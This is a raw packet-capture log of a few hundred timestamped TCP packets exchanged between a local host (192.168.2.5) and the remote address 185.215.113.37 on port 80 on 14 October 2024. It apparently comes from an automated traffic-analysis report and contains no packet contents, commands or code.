Oct 14, 2024 01:53:21.519131899 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.519140959 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519171000 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519181013 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519190073 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519201040 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.519201040 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.519237995 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.519352913 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519365072 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519375086 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519391060 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519399881 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519411087 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.519412041 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519423008 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519433975 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519443035 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519444942 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.519454002 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519463062 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519468069 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.519474030 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519490957 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.519520044 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.519646883 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519680977 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.519702911 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.519731998 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.607646942 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.607660055 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.607671976 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.607717991 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.607728958 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.607734919 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.607738018 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.607768059 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.607773066 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.607785940 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.607795954 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.607803106 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.607805967 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.607830048 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.607834101 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.607845068 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.607856989 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.607857943 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.607866049 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.607877970 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.607887983 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.607897043 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.607918978 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.607964993 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.608716011 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.608772039 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.608812094 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.608828068 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.608840942 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.608861923 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.608871937 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.608876944 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.608884096 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.608901024 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.608911991 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.608923912 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.608931065 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.608935118 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.608958006 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.608963013 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.608973980 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.608984947 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.608994961 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.608999968 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609006882 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609015942 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609047890 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609071970 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609241009 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609251976 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609262943 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609272003 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609301090 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609308958 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609322071 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609332085 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609338999 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609344006 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609361887 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609384060 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609391928 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609395027 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609417915 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609427929 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609438896 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609441996 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609448910 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609469891 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609476089 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609493017 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609503031 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609512091 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609524965 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609533072 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609533072 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609546900 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609554052 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609560013 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609570980 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609580040 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609581947 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609592915 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609603882 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609628916 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609663010 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609673977 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609684944 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609694004 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609724045 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609730005 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609736919 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609746933 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609755039 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609764099 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609781027 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609788895 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609793901 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609797001 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609806061 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609823942 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609831095 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609844923 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609858036 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609863997 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609870911 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609889984 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609899044 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609901905 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609911919 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609919071 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609922886 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609935045 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609961033 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.609972000 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609982967 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.609993935 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610001087 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610003948 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610016108 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610022068 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610059023 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610093117 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610143900 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610268116 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610279083 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610289097 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610311985 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610327005 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610327959 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610337019 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610349894 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610368967 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610378027 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610388041 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610395908 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610398054 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610423088 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610424995 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610433102 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610445023 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610452890 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610462904 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610466003 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610472918 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610483885 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610486984 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610515118 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610526085 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610529900 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610537052 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610560894 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610567093 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610572100 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610582113 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610596895 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610606909 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610615015 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610630989 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610641003 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610651016 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610652924 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610661983 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610672951 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610685110 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610693932 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610708952 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610718966 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610723019 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610729933 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610740900 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610742092 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610754013 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610764980 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610774994 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610784054 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610785961 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610795975 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610805988 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610815048 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610821962 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610824108 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610835075 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610846043 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.610847950 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610869884 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.610898018 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.698570013 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.698581934 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.698590994 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.698697090 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.698751926 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.698762894 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.698772907 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.698781013 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.698826075 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.698856115 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.698863983 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.698865891 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.698877096 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.698884964 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.698890924 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.698895931 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.698900938 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.698929071 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.699012041 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.699343920 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699379921 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699402094 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699434996 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.699465990 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.699493885 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699503899 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699512959 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699522018 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699563026 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.699596882 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.699770927 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699786901 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699795961 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699805021 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699810982 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699815035 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699825048 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699832916 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699843884 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699850082 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.699883938 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699894905 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.699929953 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699937105 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.699940920 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699956894 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.699979067 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700006008 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700023890 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700033903 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700042963 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700052023 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700083971 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700108051 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700119972 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700129986 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700139046 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700148106 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700155973 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700189114 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700215101 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700227976 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700238943 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700258017 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700268984 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700278044 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700287104 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700298071 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700320005 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700349092 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700366020 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700377941 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700387001 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700396061 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700411081 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700433969 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700475931 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700679064 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700690031 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700700045 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700717926 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700726986 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700736046 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700746059 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700746059 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700754881 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700772047 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700783014 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700790882 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700794935 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700804949 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700814962 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700820923 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700824976 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700835943 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700845957 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700855017 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700881004 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700890064 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700891972 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700901031 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700913906 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700923920 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700932980 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700938940 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700944901 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700956106 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700967073 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.700968981 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.700978041 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.701004028 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.701034069 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:21.701078892 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.701090097 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.701098919 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.701107979 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.701117992 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:21.701128006 CEST	80	49705	185.215.113.37	192.168.2.5
